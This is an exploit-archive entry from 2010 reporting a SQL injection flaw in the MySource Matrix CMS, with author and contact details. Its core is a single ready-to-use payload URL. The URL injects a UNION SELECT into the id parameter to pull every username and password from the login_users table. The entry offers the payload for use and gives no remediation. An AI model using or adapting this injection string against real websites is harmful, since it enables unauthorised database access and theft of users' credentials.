id: 14715
date: 11/03/2010
title: MySource Matrix CMS SQL Injection Vulnerability
author: Cru3l.b0y
cves: 

===============================================
MySource Matrix CMS SQL Injection Vulnerability
===============================================

[+] Exploit Title: MySource Matrix SQL Injection Vulnerability
[+] Date: 2010-11-02
[+] Author  : Cru3l.b0y
[+] Software Link: http://www.intendance.com/client-services/developing-your-site/content-management/mysource-matrix/
[+] Tested on: Ubuntu 10.10
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
 
            http://target/path/index.php?id=-1+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13,14+from+login_users



#  0day.today [2023-03-26]  #